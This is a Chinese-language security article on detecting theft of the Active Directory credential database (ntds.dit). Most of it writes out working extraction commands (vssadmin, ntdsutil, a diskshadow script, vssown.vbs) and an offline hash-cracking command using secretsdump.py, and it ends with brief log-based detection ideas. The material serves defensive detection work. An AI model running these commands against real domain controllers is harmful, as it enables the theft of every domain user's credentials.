基于AD Event日志检测NTDS凭据转储攻击

01、简介

在域环境里，域内用户hash存储在域控制器(ntds.dit)中的数据库文件中，ntds.dit文件是无法直接被复制的。在这种情况下，我们一般可以利用卷影复制服务(VSS)来实现ntds.dit的拷贝，然后下载进行离线分析和破解用户哈希。

02、利用VSS实现ntds.dit文件提取

（1）vssadmin

Windows卷影工具，使用Vssadmin来管理VSS，用来创建和删除卷影拷贝。

#创建一个新的卷影副本
vssadmin create shadow /for=c:
#将ntds.dit文件复制到新的位置
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\NTDS\ntds.dit c:\ntds.dit
#删除卷影副本
vssadmin delete shadows /for=c: /quiet

（2）ntdsutil

ntdsutil.exe 是一个命令行工具，可提供对AD的数据库维护功能，执行命令后，生成两个新文件夹：Active Directory 和 Registry，ntds.dit 文件将保存在 Active Directory 中，SAM 和 SYSTEM 文件将保存到registry文件夹。

（3）DiskShadow

Diskshadow.exe是一种工具，用于进行 VSS相关的操作。

a、将如下内容保存在command.txt文件：

set context persistent nowriters
add volume c: alias someAlias
create
expose %someAlias% z:
exec "cmd.exe" /c copy z:\\windows\\ntds\\ntds.dit c:\\ntds.dit
delete shadows all
list shadows all
reset
exit

b、进入C:\Windows\System32目录下执行：

diskshadow /s C:\command.txt

（4）vssown

vssown 是一个 vbs 脚本，可以创建和删除卷影副本，github下载地址：

https://github.com/lanmaster53/ptscripts/blob/master/windows/vssown.vbs

#启动卷影拷贝服务
cscript vssown.vbs /start
#创建一个C盘的卷影拷贝
cscript vssown.vbs /create c
#列出卷影考本
cscript vssown.vbs /list 
#将目标文件复制出来
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy4\windows\NTDS\ntds.dit c:\\ntds.dit
#删除卷影拷贝
cscript vssown.vbs /delete {71E09CF1-5FF4-4F29-B676-B669A28713DC}

（5）离线破解

通过卷影拷贝服务（vss）提取ntds.dit，需要将ntds.dit、system和sam文件 下载到本地，通过 impacket 套件中的 secretsdump.py 脚本进行破解:

secretsdump.py -sam sam.hive -system system.hive -ntds ntds.dit LOCAL

03、NTDS凭据转存攻击检测

基于以上ntds.dit文件提取的方式，通过AD Event日志监测有两种思路：

（1）在System日志中，调用卷影复制服务(VSS)会生成Event ID为7036的事件，但没有记录用户信息，无法判断来源，容易误报。

 

（2）在Security日志中，通过监测创建vssadmin、ntdsutil、diskshadow、cscript的进程名称，可以找出谁什么时间在哪台服务器上做了VSS相关的操作，实时检测异常的攻击行为。